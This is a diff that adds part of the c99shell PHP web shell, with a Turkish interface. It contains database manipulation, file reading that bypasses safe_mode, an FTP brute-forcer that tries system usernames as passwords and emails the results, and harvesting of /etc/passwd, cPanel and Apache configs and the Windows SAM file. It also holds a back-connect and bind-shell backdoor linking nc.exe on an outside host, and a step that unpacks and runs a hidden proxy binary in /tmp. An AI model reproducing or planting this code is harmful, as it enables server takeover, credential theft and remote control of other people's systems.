+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">SIL</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">Sec:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Bosalt</option>";
+      echo "<option value=\"tbldump\">Indir</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?></font><table border="0" width="100%" height="1"><tr><td width="30%" height="1">
+					<font face="Tahoma"><b>Create new DataBase:</b>
+            </font>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"><font face="Tahoma">&nbsp;</font><input type="submit" value="Create"></form></td><td width="30%" height="1">
+					<font face="Tahoma"><b>View File:</b></font><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"><font face="Tahoma">&nbsp;</font><input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+								<font face="Tahoma"><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#330000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#330000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#330000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); 
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Kirici: </b><br>";
+ if (!win) {echo "Bu ozellik Wind0ws serverlarda calismaz!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Arka Kapi Girisi:</b></br></br><form name=form method=POST>Sunucu:<input type=text name=backconnectip size=15 value=$ip> Port No: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Baglan></form>Server ile baglanti kurmaniz icin M&#601;lumatsayarinizda <a href='http://www.g3n3t1x.by.ru/exploit/nc.exe'>nc.exe</a> ve acik bir port gerekir! Komutunuz; '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Arka kapi yarat:</b></br></br><form name=form method=POST>
+Baglanti portu: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Yarat!'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>".__FILE__." Adresindeki Shelli Sil!</br></br>Silmek icin yandaki kodu girin \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"Sil\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Dosya Arama Sistemi:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>Dosya Bulunamadi</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Dosya / Dizin Ismi: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Nerde Arayalim:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Aranacak Kelimemi:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
